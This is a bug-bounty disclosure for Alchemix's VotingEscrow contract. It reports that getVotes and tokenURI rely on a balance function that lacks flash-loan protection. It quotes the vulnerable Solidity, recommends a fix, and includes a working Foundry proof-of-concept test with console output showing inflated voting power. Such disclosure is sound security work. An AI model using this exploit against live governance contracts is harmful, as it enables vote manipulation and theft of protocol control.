31507 - [SC - Critical] Malicious user could flash-loan the veALCX to i...

Submitted on May 20th 2024 at 19:48:27 UTC by @savi0ur for Boost | Alchemix

Report ID: #31507

Report type: Smart Contract

Report severity: Critical

Target: https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/VotingEscrow.sol

Impacts:

Unintended alteration of what the NFT represents (e.g. token URI, payload, artistic content)
Manipulation of governance voting result deviating from voted outcome and resulting in a direct change from intended effect of original results

Description

Bug Description

https://github.com/alchemix-finance/alchemix-v2-dao/blob/f1007439ad3a32e412468c4c42f62f676822dc1f/src/VotingEscrow.sol#L366-L369

function balanceOfToken(uint256 _tokenId) external view returns (uint256) {
    if (ownershipChange[_tokenId] == block.number) return 0;
    return _balanceOfTokenAt(_tokenId, block.timestamp);
}

The balanceOfToken() first checking if ownership change of the _tokenId is in the current block, if it is then return zero. This check is necessary to have a newly transferred veALCX tokens to have zero voting balance to prevent someone from flash-loaning veALCX to inflate their voting balance.

However, this check is not there in balanceOfTokenAt and _balanceOfTokenAt functions.

https://github.com/alchemix-finance/alchemix-v2-dao/blob/f1007439ad3a32e412468c4c42f62f676822dc1f/src/VotingEscrow.sol#L372-L374

function balanceOfTokenAt(uint256 _tokenId, uint256 _time) external view returns (uint256) {
    return _balanceOfTokenAt(_tokenId, _time);
}

https://github.com/alchemix-finance/alchemix-v2-dao/blob/f1007439ad3a32e412468c4c42f62f676822dc1f/src/VotingEscrow.sol#L1426-L1465

function _balanceOfTokenAt(uint256 _tokenId, uint256 _time) internal view returns (uint256) {
    uint256 _epoch = userPointEpoch[_tokenId];

    // If time is before before the first epoch or a tokens first timestamp, return 0
    if (_epoch == 0 || _time < pointHistory[userFirstEpoch[_tokenId]].ts) {
        return 0;
    } else {
        // Binary search to get point closest to the time
        uint256 _min = 0;
        uint256 _max = userPointEpoch[_tokenId];
        for (uint256 i = 0; i < 128; ++i) {
            // Will be always enough for 128-bit numbers
            if (_min >= _max) {
                break;
            }
            uint256 _mid = (_min + _max + 1) / 2;
            if (userPointHistory[_tokenId][_mid].ts <= _time) {
                _min = _mid;
            } else {
                _max = _mid - 1;
            }
        }

        Point memory lastPoint = userPointHistory[_tokenId][_min];

        // If max lock is enabled bias is unchanged
        int256 biasCalculation = locked[_tokenId].maxLockEnabled
            ? int256(0)
            : lastPoint.slope * (int256(_time) - int256(lastPoint.ts));

        // Make sure we still subtract from bias if value is negative
        lastPoint.bias -= biasCalculation;

        if (lastPoint.bias < 0) {
            lastPoint.bias = 0;
        }

        return uint256(lastPoint.bias);
    }
}

As a result, alchemix or some external protocol trying to use balanceOfToken and balanceOfTokenAt external functions to find voting balance will return different voting balances for the same _tokenId depending on which function they called.

https://github.com/alchemix-finance/alchemix-v2-dao/blob/f1007439ad3a32e412468c4c42f62f676822dc1f/src/VotingEscrow.sol#L264-L277

function getVotes(address account) external view override(IVotes, IVotingEscrow) returns (uint256) {
    uint32 nCheckpoints = numCheckpoints[account];
    if (nCheckpoints == 0) {
        return 0;
    }
    uint256[] memory _tokenIds = checkpoints[account][nCheckpoints - 1].tokenIds;
    uint256 votes = 0;
    uint256 tokenIdCount = _tokenIds.length;
    for (uint256 i = 0; i < tokenIdCount; i++) {
        uint256 tId = _tokenIds[i];
        votes = votes + _balanceOfTokenAt(tId, block.timestamp);
    }
    return votes;
}

As can be seen, _balanceOfTokenAt internal function which don't have flashloan protection check is called in getVotes function to compute voting balance of an account.

Its possible that alchemix or external protocols will use getVotes function to compute the voting balance of an account to use it in their calculation. Due to the use of _balanceOfTokenAt function which don't have flashloan protection, will allow users to inflate their voting power by taking a flashloan of veALCX.

https://github.com/alchemix-finance/alchemix-v2-dao/blob/f1007439ad3a32e412468c4c42f62f676822dc1f/src/VotingEscrow.sol#L359-L363

function tokenURI(uint256 _tokenId) external view override(IERC721Metadata, IVotingEscrow) returns (string memory) {
    require(idToOwner[_tokenId] != address(0), "Query for nonexistent token");
    LockedBalance memory _locked = locked[_tokenId];
    return _tokenURI(_tokenId, _balanceOfTokenAt(_tokenId, block.timestamp), _locked.end, _locked.amount);
}

Since, tokenURI function is also using same vulnerable _balanceOfTokenAt function, same attack we can perform to change the tokenURI for any _tokenId.

Impact

Since users are able to inflate their voting power, which they can use to vote for a malicious governance proposal. Same attack we can also use to alter tokenURI.

Recommendation

Flashloan protection check should be implemented in _balanceOfTokenAt function.

References

https://github.com/alchemix-finance/alchemix-v2-dao/blob/f1007439ad3a32e412468c4c42f62f676822dc1f/src/VotingEscrow.sol#L366-L369
https://github.com/alchemix-finance/alchemix-v2-dao/blob/f1007439ad3a32e412468c4c42f62f676822dc1f/src/VotingEscrow.sol#L372-L374
https://github.com/alchemix-finance/alchemix-v2-dao/blob/f1007439ad3a32e412468c4c42f62f676822dc1f/src/VotingEscrow.sol#L1426-L1465
https://github.com/alchemix-finance/alchemix-v2-dao/blob/f1007439ad3a32e412468c4c42f62f676822dc1f/src/VotingEscrow.sol#L264-L277
https://github.com/alchemix-finance/alchemix-v2-dao/blob/f1007439ad3a32e412468c4c42f62f676822dc1f/src/VotingEscrow.sol#L359-L363

Proof Of Concept

Steps to Run using Foundry:

Paste following foundry code in src/test/VotingEscrow.t.sol
Run using FOUNDRY_PROFILE=default forge test --fork-url $FORK_URL --fork-block-number 17133822 --match-contract VotingEscrowTest --match-test testVoteInflationByTransferToken -vvv

// Check inflation of votes using flashloaning veALCX
function testVoteInflationByTransferToken() public {
    address user1 = address(0x101);
    address user2 = address(0x102);

    uint256 tokenId = createVeAlcx(user1, TOKEN_1, MAXTIME, false);
    hevm.startPrank(user1);
    assertEq(veALCX.ownerOf(tokenId), user1);
    console.log("balanceOfToken(tokenId)   :", veALCX.balanceOfToken(tokenId));
    // console.log("balanceOfTokenAt(tokenId) :", veALCX.balanceOfTokenAt(tokenId, block.timestamp));
    console.log("getVotes(user1)           :", veALCX.getVotes(user1));
    console.log("getVotes(user2)           :", veALCX.getVotes(user2));

    assertEq(veALCX.balanceOfToken(tokenId), getMaxVotingPower(TOKEN_1, veALCX.lockEnd(tokenId)));
    assertEq(veALCX.balanceOfToken(tokenId), veALCX.balanceOfTokenAt(tokenId, block.timestamp));
    assertEq(veALCX.balanceOfToken(tokenId), veALCX.getVotes(user1));
    assertEq(veALCX.getVotes(user2), 0);

    hevm.stopPrank();

    // Take a flashloan of veALCX
    console.log("\nTake a flashloan of veALCX token");
    uint256 tokenId2 = createVeAlcx(user2, TOKEN_1M, MAXTIME, false);
    console.log("Created VeALCX with 1M locked tokens");
    console.log("getVotes(user2)           :", veALCX.getVotes(user2));
    assertEq(veALCX.balanceOfToken(tokenId2), getMaxVotingPower(TOKEN_1M, veALCX.lockEnd(tokenId2)));

    // Transferring tokenId2 from user2 to user1
    console.log("\nTransferring flashloaned tokenId2 from user2 to user1");
    hevm.startPrank(user2);
    veALCX.safeTransferFrom(user2, user1, tokenId2);
    assertEq(veALCX.ownerOf(tokenId2), user1);
    hevm.stopPrank();

    console.log("balanceOfToken(tokenId)   :", veALCX.balanceOfToken(tokenId));
    console.log("balanceOfToken(tokenId2)  :", veALCX.balanceOfToken(tokenId2));
    console.log("balanceOfTokenAt(tokenId2):", veALCX.balanceOfTokenAt(tokenId2, block.timestamp));
    console.log("getVotes(user1)           : %s <= Inflated voting power", veALCX.getVotes(user1));
    console.log("getVotes(user2)           :", veALCX.getVotes(user2));

    assertEq(veALCX.balanceOfToken(tokenId2), 0);
    assertEq(veALCX.getVotes(user1), veALCX.balanceOfToken(tokenId) + veALCX.balanceOfTokenAt(tokenId2, block.timestamp));

    hevm.stopPrank();
}

Console Output:

> FOUNDRY_PROFILE=default forge test --fork-url $FORK_URL --fork-block-number 17133822 --match-contract VotingEscrowTest --match-test testVoteInflationByTransferToken -vvv

Ran 1 test for src/test/VotingEscrow.t.sol:VotingEscrowTest
[PASS] testVoteInflationByTransferToken() (gas: 2317763)
Logs:
  balanceOfToken(tokenId)   : 1994518328243124355
  getVotes(user1)           : 1994518328243124355
  getVotes(user2)           : 0

Take a flashloan of veALCX token
  Created VeALCX with 1M locked tokens
  getVotes(user2)           : 1994518328259766615659745

Transferring flashloaned tokenId2 from user2 to user1
  balanceOfToken(tokenId)   : 1994518328243124355
  balanceOfToken(tokenId2)  : 0
  balanceOfTokenAt(tokenId2): 1994518328259766615659745
  getVotes(user1)           : 1994520322778094858784100 <= Inflated voting power
  getVotes(user2)           : 0

Previous31503 - [SC - Insight] Incorrect value of MAX_PROPOSAL_NUMERATOR in Al...Next31512 - [SC - Critical] Infinite minting of FLUX through Merge

Last updated 9 months ago

Was this helpful?